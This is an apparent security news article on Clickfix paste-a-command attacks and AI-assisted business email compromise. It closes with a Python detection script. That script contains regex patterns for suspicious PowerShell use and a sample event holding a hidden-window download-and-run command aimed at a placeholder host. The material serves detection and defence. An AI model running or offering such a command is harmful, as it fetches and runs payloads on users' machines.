Your hard-won phishing survival instincts are only marginally useful to you in the face of the security threats that are currently crashing like a tsunami over corporate networks. CNTT: 70% of threat actors are bypassing lures and “going after the human layer itself” with new tactics, leveraging Clickfix social engineering as their favorite weapon to transform the everyday worker into an unwitting insider — or using AI-powered business email compromise.
In its most recent Global Threat Intelligence Report, Mimecast reports a 500 per cent spike in Clickfix-style campaigns over the latest reporting period; they now account for around eight per cent of all observed attacks. The approach is catching on because it does not depend on malware-laden attachments or suspicious links. It convinces the recipient to do the work themselves.

Security advisories from leading vendors, Microsoft among them, confirm the trend: attackers are leaning on "living off the land" techniques and abusing remote monitoring and management (RMM) tools to gain an initial foothold, with social engineering at the heart of the playbook.
The Human Bypass at the Heart of Clickfix
Clickfix campaigns replace the old "click this link" with "fix this problem." Victims are shown a believable error message or help prompt along with step-by-step instructions telling them to open a built-in tool such as PowerShell and paste a command. That single pasted command retrieves and runs a payload (anything from an information stealer to ransomware) while sidestepping many email and web filters, because no attachment or link ever had to pass through them.
It works because it exploits two reliable behaviors: our urge to resolve problems as quickly as we can, and the trust we place in native system utilities. Training users to spot bad links or attachments does not cover this vector at all, and endpoint controls all too commonly leave the very tools these campaigns weaponize available on every workstation.
AI Turns BEC Into a Full-Cast Social Engineering Production
Attackers are also leveraging generative AI to create entire email conversations that impersonate executives, vendors and outside counsel. Instead of one phishing message there’s a thread with context, artifacts and urgency that looks and feels like something you’re already working on.
Deepfake voice (and even brief video) is being added to the mix to seal the deal on invoice payments, bank detail change requests, payroll updates and wire transfers. AI can change wording and tone on the fly to evade content-based detection and mirror the language of a real finance team or supplier.

The FBI's Internet Crime Complaint Center has listed BEC as the most expensive category of cybercrime, with more than a billion dollars in reported losses. As AI lowers the barrier to creating convincing dialogue and persona takeovers, expect more of both, in volume and in quality.
Sectors in the Crosshairs for Social Engineering and BEC
Mimecast reports heightened risk for the education, IT services, telecommunications, legal services and real estate industries: sectors that conduct time-sensitive transactions and hold confidential client or financial information. Real estate, for instance, continues to see a steady rise in social engineering as criminals pursue high-dollar, deadline-driven closings.
Groups such as Scattered Spider and TA2541 have also been associated with campaigns that rely heavily on social engineering and abuse of remote tools for footholds, which shows how malware-free initial access has gone mainstream.
Why Old Filters Are No Longer Cutting It
Traditional defenses operate on the principle that malicious artifacts look foreign. Clickfix blurs that line by directing a human to use trusted parts of the system, leaving few clear signs for an email gateway to detect. Meanwhile, AI-generated content erodes the telltale signs of fakery, such as awkward grammar and mismatched style, that users had been trained to recognize.
The Verizon Data Breach Investigations Report consistently reveals that the majority of breaches have a human element. The takeaway is inescapable: vigilance counts for something, but asking users to be sophisticated enough to spot every trick is not only unfair; it’s not even going to work against opponents who iterate faster than awareness programs.
Defensive Moves That Work Against Clickfix and AI-Driven BEC
- Shrink the blast radius with hard controls: restrict scripting and admin tools via policy, enable PowerShell Constrained Language Mode, block unknown RMM software, and tune endpoint detection for "living off the land" behaviors, e.g. suspicious command launches or unusual parent/child process pairs. Segment critical systems and lock down outbound egress to cut off command-and-control.
- Raise the bar for payments and vendor changes with out-of-band verification, multi-person approvals, and independent account checks that an urgent-sounding email cannot bypass.
- Reinforce email with DMARC enforcement, and lock down privileged access using least privilege and just-in-time elevation.
- Retrain with simulated scenarios based on Clickfix and AI-driven BEC. Teach one simple rule: no reputable support channel will direct you to run code on your machine. Reward employees who slow down and escalate rather than "solve" the problem. Track speed-to-report and time-to-containment, not just click rates.
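The process-launch signal the first bullet describes (an interactive parent spawning a native interpreter with a suspicious command line), as an added example in Python that is not from the article or from Mimecast; the event fields mimic Sysmon process-creation records, and the sample events, user names and alert threshold are constructed:

```python
"""Detection heuristics for Clickfix-style "paste this command" execution, run over
constructed process-creation events. Added example; all names and events are constructed."""
import re

# Interactive parents a Clickfix victim launches from: the Run dialog or the browser.
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Native interpreters the lure tells the user to open (living off the land).
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Command-line traits typical of a pasted one-liner: hidden window, encoded payload,
# download-and-run, or reading the payload back from the clipboard.
SUSPICIOUS_ARGS = [
    (r"-(w|win|windowstyle)\s+hidden", "hidden window"),
    (r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"\b(iex|invoke-expression)\b", "inline evaluation"),
    (r"\b(downloadstring|invoke-webrequest|iwr|curl)\b", "remote fetch"),
    (r"\bget-clipboard\b", "clipboard payload"),
]

def score_event(event: dict) -> list[str]:
    """Return matched reasons for one event; an empty list means nothing to flag."""
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    child = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    reasons = []
    if parent in USER_PARENTS and child in LOLBIN_CHILDREN:
        reasons.append(f"{child} spawned from {parent}")
        for pattern, label in SUSPICIOUS_ARGS:
            if re.search(pattern, event.get("CommandLine", ""), re.IGNORECASE):
                reasons.append(label)
    return reasons

def flag_clickfix(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Alert only when the parent/child pair carries at least one suspicious trait,
    so a user merely opening PowerShell from the Run dialog does not page anyone."""
    alerts = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= 2:
            alerts.append((ev["User"], reasons))
    return alerts

# Constructed sample events: an admin's scheduled script and a Clickfix-style paste.
SAMPLE_EVENTS = [
    {"User": "CORP\\admin", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"User": "CORP\\jsmith", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'https://example.invalid/fix.txt')\""},
]
```

The regexes are a starting point for an EDR or SIEM rule, not a complete signature; pair them with the policy controls above so a match is rare enough to investigate.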
The takeaway from this latest threat intelligence: be phishing savvy, and then some. The human layer needs layered controls and verified processes, combined with AI-aware detection, to turn people into a hard target rather than the softest asset to attack.